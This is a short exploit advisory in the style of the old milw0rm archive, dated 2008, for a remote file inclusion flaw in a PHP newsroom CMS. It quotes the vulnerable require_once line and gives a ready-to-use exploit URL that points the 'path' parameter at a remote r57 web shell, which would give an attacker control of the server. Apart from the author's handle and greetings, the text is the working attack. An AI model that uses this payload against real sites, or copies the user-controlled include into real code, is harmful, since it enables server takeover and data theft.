##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ##################################################################### # # Discovered by : Ciph3r # # # MAIL : Ciph3r_blackhat@yahoo.com # # # SP tanx4: Iranian hacker & Kurdish security TEAM # # sp TANX2: milw0rm.com & google.com & sourceforge.net # # CMS download : http://sourceforge.net/project/showfiles.php?group_id=221515 # # class : remote # # risk : high # # message : agha kovat tavalodet mobarak ! inam kadoye tavalodet :d ####################################################################### # # C0de : # # # require_once ($path.'/classes/feedStories.class.php'); # # ####################################################################### EXPLOIT : www.[Target].com/path/includes/home.php?path=[r57.txt?] ####################################################################### # milw0rm.com [2008-07-11]